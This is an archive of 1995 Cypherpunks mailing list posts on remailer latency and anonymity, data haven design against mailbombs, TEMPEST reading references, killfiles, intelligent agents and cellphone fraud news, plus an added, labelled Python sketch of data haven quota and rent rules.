> Uv76Kmmya6EMxTJOJFtatP1uQ7V6JmSA
> =g1Bd
> -----END PGP SIGNATURE-----
> 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@mm.com>
Date: Sat, 7 Jan 95 04:52:46 PST
To: cypherpunks@toad.com
Subject: Killfiles 101
Message-ID: <Pine.3.89.9501070625.I14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



1. The best and only way you can be sure you're 
   killing a file is to turn your machine off.
   Only then can you be sure it is dead.

2. If you must resort to using killfiles,
   (great marketer trick, make you use it 
   again and again, and again, like a gun)
   kill "classes" of files, as opposed to
   individuals, you'll get better kill ratio.
   A good example is anon or wizvax users.

3. Note: Killfiles are a censor's best friend!
   And you'll become what you swore you wouldn't.

Does your signature tell the truth nesta? Can't know everything 
with a killfile! Eventually you'll kill the file that'd get you sex.


Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: x <cyber1@io.org>
Date: Sat, 7 Jan 95 03:59:40 PST
To: cypherpunks@toad.com
Subject: intelligent discovery agents
Message-ID: <Pine.BSI.3.91.950107065739.8875A-100000@bonk.io.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995 Nesta Stubbs <nesta@nesta.pr.mcs.net> wrote:

>> There was some recent talk about network agent technology on this list.
>>
> does anyone have any information about intelligent agents?  I mean I know 
> about filter and stuff, but they aren't intelligent agents.  I assume one 
> would be something like the WWW worm and other searching scripts that 
> have a database of information to cross-reference their finds and decide 
> what to send back to you.  

You might want to check out Brian LaMacchia's Ph.D. proposal to create
a new class of knowbot, to be termed "Internet Fish".  It is posted on 
http://www.swiss.ai.mit.edu/~bal/bal-home.html

LaMacchia's proposal is interesting in that his 'fish' seem to have 
limited autonomy, thus moving us closer to a content-addressable model
of net info retrieval.

Also of interest is RFC 1728: Resource Transponders, by C. Weider.  The
idea is that there should be meta-information (information about 
information) available for use by info retrieval programs like 'archie'.  
From ftp://nic.ddn.mil/rfc/rfc1728.txt

The following is extracted from LaMacchia's abstract:

> We will design, implement and deploy a system for constructing
> ``Internet Fish,'' a new type of resource discovery tool.  Internet
> Fish attempt to discover new sources of information related to a
> particular topic; characteristics that describe the topic of interest
> may be specified by the user or deduced by the Fish over the course of
> time.  As part of the information-gathering process Fish conduct
> long-term conversations with users; these conversations permit Fish to
> ask for human assistance when necessary and allow humans to
> dynamically reallocate Fish resources.  In addition, Fish facilitate
> *serendipitous* resource discovery; that is, the act of finding
> interesting information in an unexpected place or manner, information
> that we were ``lucky'' to have discovered.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 05:17:09 PST
To: cypherpunks@toad.com
Subject: Dear Zimmy,
Message-ID: <Pine.3.89.9501070733.K14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



They still miss the point, I think.

They haven't figured out how to teach others.

They can do it in ten newsgroups.

They whine and snivel like two year old brats.

They just can't for the life of them grab the original letter.

They can't go teach their top-ten newsgroups.

They can't figure out how to come back here and rant how

they did it and I didn't (lose my account over it)

They rapidly forget crypto loses its power against a bullet.

Eventually they'll come with guns again and take the machines away.

There were 10,000 newsgroups I only went to 10.

The best kill file is a turned off machine.

I touched my first fortran card 22 years ago.

There's a lot of difference between showing up the 12th,

and showing up in say 12 newsgroups.

Sorry Zimmy, It don't look good for the home team.

Love Always,

Carol Anne

Signature back on the drawing board 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 05:32:38 PST
To: cypherpunks@toad.com
Subject: A day in the life of the Cypherpunk list
Message-ID: <Pine.3.89.9501070747.L14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Bruce,

When you see the actual postings on the last 24 hours,
they are all running to the newsgroup to use killfiles.

Isn't it ostriches that do that kinda thing?

They've been caught napping.

The Webbittown Post Office could use all the remail people.
Every last one of them.

And meanwhile, still stuck in the pine composer, lies the original response.

Good copy, definitely good copy.

Love Always,

Carol Anne

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 06:02:50 PST
To: x <cyber1@io.org>
Subject: Re: intelligent discovery agents
In-Reply-To: <Pine.BSI.3.91.950107065739.8875A-100000@bonk.io.org>
Message-ID: <Pine.3.89.9501070804.M14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


There's this rad.web.intelligent person by the name of Sang.
Visit Sang at http://www.inlink.com/users/sangria/homepage.html

Sang has more information on Robots, Spiders, Ants, and Worms
than any other computer person I have yet to link up with.
Feel free to grab a copy of the Web Server Software while you're there.

Love Always,

Carol Anne

On Sat, 7 Jan 1995, x wrote:

> On Fri, 6 Jan 1995 Nesta Stubbs <nesta@nesta.pr.mcs.net> wrote:
> 
> >> There was some recent talk about network agent technology on this list.
> >>
> > does anyone have any information about intelligent agents?  I mean I know 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Sat, 7 Jan 95 08:44:51 PST
To: Derek Zeanah <Derek.Zeanah@f903.n102.z1.fidonet.org>
Subject: Re: TEMPEST Questions...
In-Reply-To: <121_9501062145@borderlin.quake.com>
Message-ID: <Pine.3.89.9501070814.A11177-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain




On 6 Jan 1995, Derek Zeanah wrote:

> 
> I'm writing an article on TEMPEST technology.
> 
> The focus is on what TEMPEST is and how to defeat it, if possible.  So far
> I've gotten some insightful information, but I'm looking for all I can get.
> 
> Has anyone ever heard of TEMPEST being used in the continental US?  Can anyone
> tell me what measures offer some level of protection, or steps that can be
> taken to reduce the likelihood of being successfully targeted?  Has anyone
> ever seen TEMPEST in action?
> 
You might start with van Eck, Wim, "Electromagnetic Radiation from Video 
Display Units:  An Eavesdropping Risk?", Computers & Security 4 (1985) 
269-286.  That will give you the technical basics.

If someone has actually seen Tempest interception in action, I'd like to 
hear about that as well.

John A. Thomas		jathomas@netcom.com
N5RZP			214/263-4351




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 7 Jan 95 08:59:01 PST
To: jathomas@netcom.com (John A. Thomas)
Subject: Re: TEMPEST Questions...
In-Reply-To: <Pine.3.89.9501070814.A11177-0100000@netcom6>
Message-ID: <199501071544.JAA00423@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

Regarding Tempest, 

Something similar happens to me in my workshop. I have several computers
stacked on two shelves. It is quite common for several of them to be on
at one time. In particular when I have my Amiga 1200 driving my NEC TV/Monitor
I notice that it appears on the other composite video monitors even though
the Amiga drives RGB. What I think is happening is that the NEC is converting
the RGB to standard TV drive rates. The short of it is that I can watch my
Amiga 1200 on my TV that is sitting a couple approx 3ft. from it.

It could also be the fact that the 1200 has a video output that is poorly 
shielded. It is capable of driving a composite device directly as well.

One aspect that is interesting is that if you have several sources going 
at once the quality degrades. One possible technique for defeating such
monitoring would be to have a couple of standard video recorders drive a
video game rf modulator tied to an antenna to provide a 'shell' of drivel
from your cable feed. Your VCR may be able to drive the antenna directly.

Take care.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.Denver.Colorado.EDU (Alan Westrope)
Date: Sat, 7 Jan 95 09:38:57 PST
To: cypherpunks@toad.com
Subject: Re: Peter D. Lewis
In-Reply-To: <199501070558.AAA04212@bb.hks.net>
Message-ID: <Bbi3laa0iIK9076yn@ouray.denver.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 7 Jan 1995, "L. Todd Masco" <cactus@hks.net> wrote:

> Like "Seventeen," "Wired" should prepend "don't you wish you were" to
> its title.

Ah, yes, I wish I were "(c) Both of the above" -- as the Sinatra lyric
sez, "When I was seventeen, it was a very WiReD year..."

I think generalizing about "Wired" is like generalizing about the NY
Times, where Markoff and Lewis arguably exemplify the best and worst
of mainstream computer/telecom journalism.  "Wired" has many flaws, but
I consider Steven Levy's articles about Cypherpunks, Whitfield Diffie,
and digital cash to be among the best expositions of Cypherpunk issues
for the layperson.  (Kelly's "Whole Earth Review" piece is another.)

I can forgive some faults in return for seeing Levy's non-technical
explanations of public-key crypto and the Dining Cryptographers protocol
in successive issues. :-)

Alan Westrope                  <awestrop@nyx.cs.du.edu>
__________/|-,                 <adwestro@ouray.denver.colorado.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Sat, 7 Jan 95 09:21:03 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <199501071710.LAA21334@pentagon.io.com>
Message-ID: <199501071606.KAA00541@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> 
> While programming my data haven code, I am wondering how to guard against
> spamming the data haven parser.  It is trivial to mount a denial of
> service attack by repeatedly mailing large files, which will fill up the 
> quota or filesystem of the data haven host, and if you have mail on a 
> root partition, will cause hangs or crashes.
>
If there is no cost associated with the haven and there are no account
limitations (ie anyone can get an account) then I don't see a means to do
it reliably. However, if you work up a fee based scheme such that you 
charge per M then it is trivial. If the data is larger than the account
balance it bounces. By limiting the availability of accounts you can make
it less enticing for users to spam the haven because they are hurting
themselves. And it is assumed that since the accounts are limited  that 
there is an assumed web of trust working.

> Any ideas on how to guard against mailbombs, and to confirm to the sender
> that their files are stored successfully?  Perhaps do a mailing with
> a test command that validates the existence of the file, and sends a
> reply back whether the file is okay or not, or would this result in a
> possible security hole?
>
It seems to me that a message should come back only if there is a problem.
 
> As to the code, this will have to be my second rewrite as I am going to
> do it in perl code, rather than C...  last rewrite was from a daemon to
> a program activated by a .forward file.
> 
> Lastly, instead of postage (like a remailer would get), how hard would it
> be to implement "rent" where if the "rent" is not paid, and a grace period
> has elapsed the file would be trashed.  All this while preserving the
> anonymity of the sender and the data haven site.
>
This form of dating files is pretty common in bbs systems where if a user
doesn't log in for say 30 days the account and its contents are deleted.
To do this doesn't even require knowing anything about the user  other than
how long the files have been there versus how long they are supposed to be
there.

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 10:47:56 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: A Fire Upon the Deep
In-Reply-To: <199501071808.NAA09510@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950107103037.10733D-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Adam Shostack wrote:
> 	Anonymous mail has bandwidth costs that are only slightly
> higher than regular mail.  You could hide quite a bit in most video
> packets.  The latency is a reflection of the lack of volume, because
> volume is needed for reordering.  If your favorite remailer gets more
> mail, the latency will drop.

Anonymous e-mail that goes through a chain of N remailers will cost at
least N times as much bandwidth and have N times as much latency as normal
e-mail.  But e-mail is hardly the state-of-the-art of network
communication, while anonymous e-mail IS the state of the art for
anonymous communication.  How long will it take for the technology of
anonymous video conferencing to develop, for example?  By then, of
course, those who are not concerned with anonymity will probably have
things such as full sensory virtual interaction. 

Note that I SUPPORT anonymous communication, but its costs of bandwidth 
and latency may be a real obstacle to developing Cryptoanarchy (of the 
kind described by Tim May) if most people are not willing to put up with 
those costs.

Wei Dai
PGP encrypted mail welcome.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Jan 95 07:58:53 PST
To: cypherpunks@toad.com
Subject: NYT on Survivalists
Message-ID: <199501071559.KAA23283@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Philip Weiss writes in tomorrow's Magazine a very long (52K) 
cover story on Idaho survivalists Bo Gritz, Randy Weaver and 
the burgeoning anti-government population.  The longest story 
I've seen in there in years.

Mentions societal threats of cashless economy, tax nix, and 
more c'punk tonics.

Is The Times getting antsy, seeding a L&O crackdown?  Or 
huffing luridities?

See for yerself by sending blank message with subject:  SUR_huf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Sat, 7 Jan 95 09:09:48 PST
To: cypherpunks@toad.com
Subject: Data Haven problems
Message-ID: <199501071710.LAA21334@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


While programming my data haven code, I am wondering how to guard against
spamming the data haven parser.  It is trivial to mount a denial of
service attack by repeatedly mailing large files, which will fill up the 
quota or filesystem of the data haven host, and if you have mail on a 
root partition, will cause hangs or crashes.

Any ideas on how to guard against mailbombs, and to confirm to the sender
that their files are stored successfully?  Perhaps do a mailing with
a test command that validates the existence of the file, and sends a
reply back whether the file is okay or not, or would this result in a
possible security hole?

As to the code, this will have to be my second rewrite as I am going to
do it in perl code, rather than C...  last rewrite was from a daemon to
a program activated by a .forward file.

Lastly, instead of postage (like a remailer would get), how hard would it
be to implement "rent" where if the "rent" is not paid, and a grace period
has elapsed the file would be trashed.  All this while preserving the
anonymity of the sender and the data haven site.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
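
[Added example, not part of the original posts and not dfloyd's code: a sketch of the intake rules discussed in this thread (charge per MB against a prepaid balance, bounce anything the balance cannot cover, reply only on a problem, trash files whose rent has lapsed past a grace period). The price, rent period, grace period, size cap and the opaque account tokens are all assumptions made for the illustration.]

```python
import math
from dataclasses import dataclass, field

MB = 1024 * 1024
PRICE_PER_MB = 1           # assumption: credits per MB per rent period
RENT_PERIOD = 30 * 86400   # assumption: seconds covered by one payment
GRACE = 7 * 86400          # assumption: seconds an overdue file survives
MAX_MESSAGE = 10 * MB      # assumption: hard per-message cap


@dataclass
class Account:
    balance: int                                # prepaid credits
    files: dict = field(default_factory=dict)   # name -> (size, paid_until)


class DataHaven:
    """Accounts are keyed by an opaque token; no sender identity is kept."""

    def __init__(self, disk_bytes):
        self.free = disk_bytes
        self.accounts = {}

    @staticmethod
    def cost(size):
        # Round up to whole megabytes so tiny files are never free.
        return max(1, math.ceil(size / MB)) * PRICE_PER_MB

    def deposit(self, token, name, size, now):
        """Return None when stored (no reply is sent), else a bounce reason."""
        # Cheapest checks first: a mailbomb is rejected before any write.
        if size > MAX_MESSAGE:
            return "bounce: message exceeds size cap"
        acct = self.accounts.get(token)
        if acct is None:
            return "bounce: unknown account"
        if name in acct.files:
            return "bounce: name already in use"
        price = self.cost(size)
        if price > acct.balance:
            return "bounce: insufficient balance"
        if size > self.free:
            return "bounce: haven full"
        acct.balance -= price
        self.free -= size
        acct.files[name] = (size, now + RENT_PERIOD)
        return None

    def pay_rent(self, token, name, now):
        """Extend a file by one rent period, charged to the same balance."""
        acct = self.accounts.get(token)
        if acct is None or name not in acct.files:
            return "bounce: no such file"
        size, paid_until = acct.files[name]
        price = self.cost(size)
        if price > acct.balance:
            return "bounce: insufficient balance"
        acct.balance -= price
        acct.files[name] = (size, max(paid_until, now) + RENT_PERIOD)
        return None

    def sweep(self, now):
        """Trash files overdue past the grace period; only timestamps are used."""
        removed = []
        for acct in self.accounts.values():
            for name, (size, paid_until) in list(acct.files.items()):
                if now > paid_until + GRACE:
                    del acct.files[name]
                    self.free += size
                    removed.append(name)
        return removed


if __name__ == "__main__":
    haven = DataHaven(50 * MB)
    haven.accounts["tok-constructed"] = Account(balance=3)   # constructed sample
    # A sender repeatedly mailing 1 MB files runs out of credit, not the disk.
    for i in range(5):
        print(i, haven.deposit("tok-constructed", f"f{i}", MB, now=0))
```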




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peb@netcom.com (Paul E. Baclace)
Date: Sat, 7 Jan 95 11:19:20 PST
To: root@einstein.ssz.com
Subject: Re: TEMPEST Questions...
Message-ID: <199501071919.LAA22533@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Grady Ward wrote an article on implementing something like TEMPEST
("something like" means that it was not derived from classified
documents).  I can't seem to find my copy of his text and it doesn't 
appear anymore at netcom:/ftp/pub/gr/grady...Anyone have a pointer
to this?

This article is definitely the most practical and comprehensive that
I've seen on this subject.

Paul E. Baclace
peb@netcom.com
peb@eng.sun.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 11:50:42 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Latency Costs of Anonymity
In-Reply-To: <Pine.SUN.3.91.950107103037.10733D-100000@eskimo.com>
Message-ID: <199501071950.LAA22106@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


[thread name changed to reflect actual topic]

Wei Dai wrote:

> Note that I SUPPORT anonymous communication, but its costs of bandwidth 
> and latency may be a real obstacle to developing Cryptoanarchy (of the 
> kind described by Tim May) if most people are not willing to put up with 
> those costs.
> 

The good news is that many of the messages that people want
anonymity for are *text* files, e.g., offers of services,
controversial data or opinions, etc. 

There's a kind of tradeoff in size and urgency. To wit, it is seldom
"urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I
can't draw my favorite little diagram here showing the space of
messages, with "urgency" and "size" as the axes.)

However, I will try such a diagram here:

    ^      ^         
    |      |short                    <---there are very few large files
 URGENCY   |messages                     that must be urgently transmitted
           |
           |
           |
           |                  non-urgent
           |                  huge files
           ---------------------->
             text     books    videos
             10K       1 MB     1GB
                   S I Z E --->

(The tradeoffs are of viewing time, caching, information, etc. A short
message can be _read_ quickly, and hence may need to be transmitted
quickly. The canonical "Attack at dawn" message, for example. A long
message, such as my 1.3 MB FAQ, clearly can be delayed for hours or
days with no real loss, save impatience. My contention is that network
speeds--ISDN, Mosaic usage, faster modems, direct connections--are
being set up and that "urgent-but-small" messages will fit in nicely,
and with low latency through remailers. In the next several years,
that is.)


What this means is that networks of the future, set up to handle huge
files, video-on-demand, etc., will allow text messages to be carried
almost unnoticeably. Interstitially, if you will.

Reordering still requires N messages (whatever N may be), so it is
true that remailer sites must still have some traffic. But this
doesn't have to introduce latencies that are unacceptable.

(If this isn't clear, what I mean by the situation about large files
being shipped is that there should be little cost for users
circulating their own dummy messages through remailer chains. Digital
postage will cost, but costs will drop. Lots of tradeoffs here. No
point in me or any of us trying to anticipate costs, volumes, etc., as
these will evolve and the market will decide.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 7 Jan 95 12:51:25 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Latency Costs of Anonymity
In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.950107123504.23218B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Jan 1995, Timothy C. May wrote:

> The good news is that many of the messages that people want
> anonymity for are *text* files, e.g., offers of services,
> controversial data or opinions, etc. 
> 
> There's a kind of tradeoff in size and urgency. To wit, it is seldom
> "urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I
> can't draw my favorite little diagram here showing the space of
> messages, with "urgency" and "size" as the axes.)

The points Tim makes here are quite good.  However, I'm more concerned 
with a slightly longer time scale, when people focus less on FILES, 
but more on CONVERSATIONS and INTERACTIONS.  It is then that latency 
becomes more problematic.

Can anyone give me an estimate of when truly anonymous video conferencing 
will become possible?  This is not just to help me make the point, but 
I'm really wondering.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 7 Jan 95 10:08:06 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
Message-ID: <199501071808.NAA09510@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Anonymous mail has bandwidth costs that are only slightly
higher than regular mail.  You could hide quite a bit in most video
packets.  The latency is a reflection of the lack of volume, because
volume is needed for reordering.  If your favorite remailer gets more
mail, the latency will drop.

	Also, on the book trend, Neal Stephenson's new book, The
Diamond Age (Bantam Spectra, 1995) has a brilliant hacker dump
information he comes across because it's encrypted, and he knows he'll
never manage to break the encryption scheme.  I haven't finished it,
but it's quite good about 1/3 of the way through.

Adam


Wei Dai wrote:

| One more thing that's marginally related to cypherpunks (hey I really
| like this book so I'll take any chance I can to talk about it ;-) is
| the idea that the efficiency of distributed computation (and distributed 
| intelligence) depends on high bandwidth and low latency of the communication
| medium.  Since anonymity seems to have rather high costs in terms of
| bandwidth and latency (compare anonymous e-mail with internet video
| conferencing or even with normal e-mail), this implies that
| an organization of anonymous agents will not work as efficiently as
| a similar organization whose members are not concerned about
| anonymity.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sat, 7 Jan 95 10:19:54 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: procmail
In-Reply-To: <Pine.3.89.9501062210.A7984-0100000@nesta.pr.mcs.net>
Message-ID: <199501071818.NAA09659@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


ftp.informatik.rwth-aachen.de:/pub/packages/procmail

I find I need the following rule to get everything sent to
cypherpunks:


:0
* (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks@toad.com)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doumakes@netcom.com (Don Doumakes)
Date: Sat, 7 Jan 95 11:27:20 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Let's NOT talk about Netcom
Message-ID: <199501071927.LAA09582@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If I wanted to read flamage about Netcom, I'd check out netcom.general,
which is 150 messages a day of, mostly, garbage.  I earnestly request
that we not duplicate that clutter on the cpunks list.

- --
______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLw6RQxtumcu2AjihAQHKTwP/fMxLVjDp/9yO2hFkCJQ+Vo5PGQvEAakt
KiCrs3nTsbZwkwxjyzgwgnuJkOVcIWgIndkO+AViI4zmOTT+9lp2FlK3gdv1qIWl
+pI/rkcegd9jyzRxz+HybONLtppAft8RZ6UlPmzS2w2Il+oHIPK9OtxRH5bGXj2D
YHzBctPXYt0=
=msXo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 7 Jan 95 11:54:26 PST
To: cypherpunks@toad.com
Subject: Re: cel fraud
In-Reply-To: <9501071759.AA00953@anon.penet.fi>
Message-ID: <950107.134210.3m7.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, an172607@anon.penet.fi writes:

> AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations
> have become such a successful criminal industry that some criminals sell the
> phones with 30-day guarantees.
> 
> "If a number is cut off, you can bring it back to the cellular bandits and
> have it reprogrammed for no additional charge," he explained. "It costs the
> carriers around $1 million a day."
> 
> He paused, then added: "It just shows how big a demand there is for wireless
> communications."

Does anyone else think this is funny (in both senses of the word)?

The cell-phraud system shows a demand for cheap, though illegal, phone
service.  The wireless aspect is pretty much incidental to the fraud
aspect, no?
- -- 
       Roy M. Silvernail         [ ]  roy@cybrspc.mn.org
                    PGP public key available by mail
     echo /get /pub/pubkey.asc | mail file-request@cybrspc.mn.org
         These are, of course, my opinions (and my machines)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw7vEhvikii9febJAQGLlgQAiteZ/51syb6gSkiwWMLs9oQ+99hMxbps
L7rshpeQ0xDM7GN+Szz4PiQ4CQrqMlxxkvgppsrRbU2E5WPv8IGvW9pa6gWx8Y9B
H/ZwmjSz1lIMCATh5osFt9myK3nkwHasxjGYqpyJJwcbTd+rQi8/lIv1EYcxv+HX
qtiHdjrFvbE=
=D0AH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 14:58:36 PST
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Latency Costs of Anonymity
In-Reply-To: <Pine.SUN.3.91.950107123504.23218B-100000@eskimo.com>
Message-ID: <199501072258.OAA28744@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:

> The points Tim makes here are quite good.  However, I'm more concerned 
> with a slightly longer time scale, when people focus less on FILES, 
> but more on CONVERSATIONS and INTERACTIONS.  It is then that latency 
> becomes more problematic.
> 
> Can anyone give me an estimate of when truly anonymous video conferencing 
> will become possible?  This is not just to help me make the point, but 
> I'm really wondering.

I didn't know you meant real-time conversations and interactions.
These are indeed very hard to get acceptable latency on in mixes.

Defeating traffic analysis in such a case is highly problematic, at
least with conventional remailers. (Unconventional remailers, such as
a dedicated telephone "traffic scrambler," with lots of internal
bandwidth between nodes, could work. Obviously a lot of other traffic
would have to be flowing in and out.)

The tradeoffs are best analyzed with an actual mathematical model of
nodes, traffic rates, clumping of traffic, etc., rather than our
hand-waving here (hand-waving is OK for broad conceptual points, but
not in cases like this).

I'll be interested in what others calculate, but I think "conversation
mixes" are several years off, at best. The upcoming demo of Voice PGP
by Phil Zimmermann (scheduled to appear at the Demo Day meeting next
Saturday) may be a step in this direction.

BTW, to my graph in my last post we could add a z-axis representing
"value." Roughly, how much per unit of data transmitted. The
crypto-canonical "Attack at dawn" message might easily be worth many
dollars per byte to transmit untraceably, whereas a casual phone
conversation between Alice and Bob may not be worth (to them,
separately or in combination) much more than a few cents per kilobyte
transmitted.

In other words, there are economic as well as technologic reasons I
doubt we'll see low-latency, high-bandwidth audio or video remailers
anytime soon. (As we're seeing now: short messages can get through in
tens of seconds, 

But like I said, some calculations are called for. I'd start by
analyzing the existing voice-over-Internet systems, the packet sizes,
and so forth.

My suspicion is that Alice and Bob cannot defeat traffic analysis
while ~10K bits per second are flowing continuously between them
(audio), at least not until _many_ subnetworks are _much_
faster. Also, the CPU loads would be great (= costly). Video is even
further off. Tricks to reduce bandwidth may help.

The digital mixes implicitly assumed in "True Names"--the year before
Chaum published his seminal mix paper--are a ways off.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 7 Jan 95 14:59:27 PST
To: cypherpunks@toad.com
Subject: Re: Latency Costs of Anonymity
Message-ID: <199501072300.PAA25794@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai <weidai@eskimo.com>
> The points Tim makes here are quite good.  However, I'm more concerned 
> with a slightly longer time scale, when people focus less on FILES, 
> but more on CONVERSATIONS and INTERACTIONS.  It is then that latency 
> becomes more problematic.

I think this is a good point.  We have had some discussions about getting
anonymity with web browsing.  The "mix" or "remailer" concept doesn't
work so well there as the connections are very short, so there is less
chance of multiple communications going on at one time.

OTOH I have heard discussions of asynchronous transfer mode, ATM, as a
new packet-based network technology that could support high bandwidth
communications.  All messages, presumably even streams like video
signals, get broken into fixed-size packets, which make their way through
the network and are reassembled into a stream on the other end.  The
individual packets may not all take the same path through the network.
(I am far from an expert on ATM so I welcome corrections to this
description.)

This technology does sound like mixing could work pretty well to provide
anonymity.  There is some price in bandwidth and latency but ATM is so
fast that probably several steps of chaining and mixing would be
possible.  Naturally such mixes would have to be hardware based due to the
rapid speeds of the packets.  So this would be kind of a "souped up"
version of our current email remailer network, with vastly greater
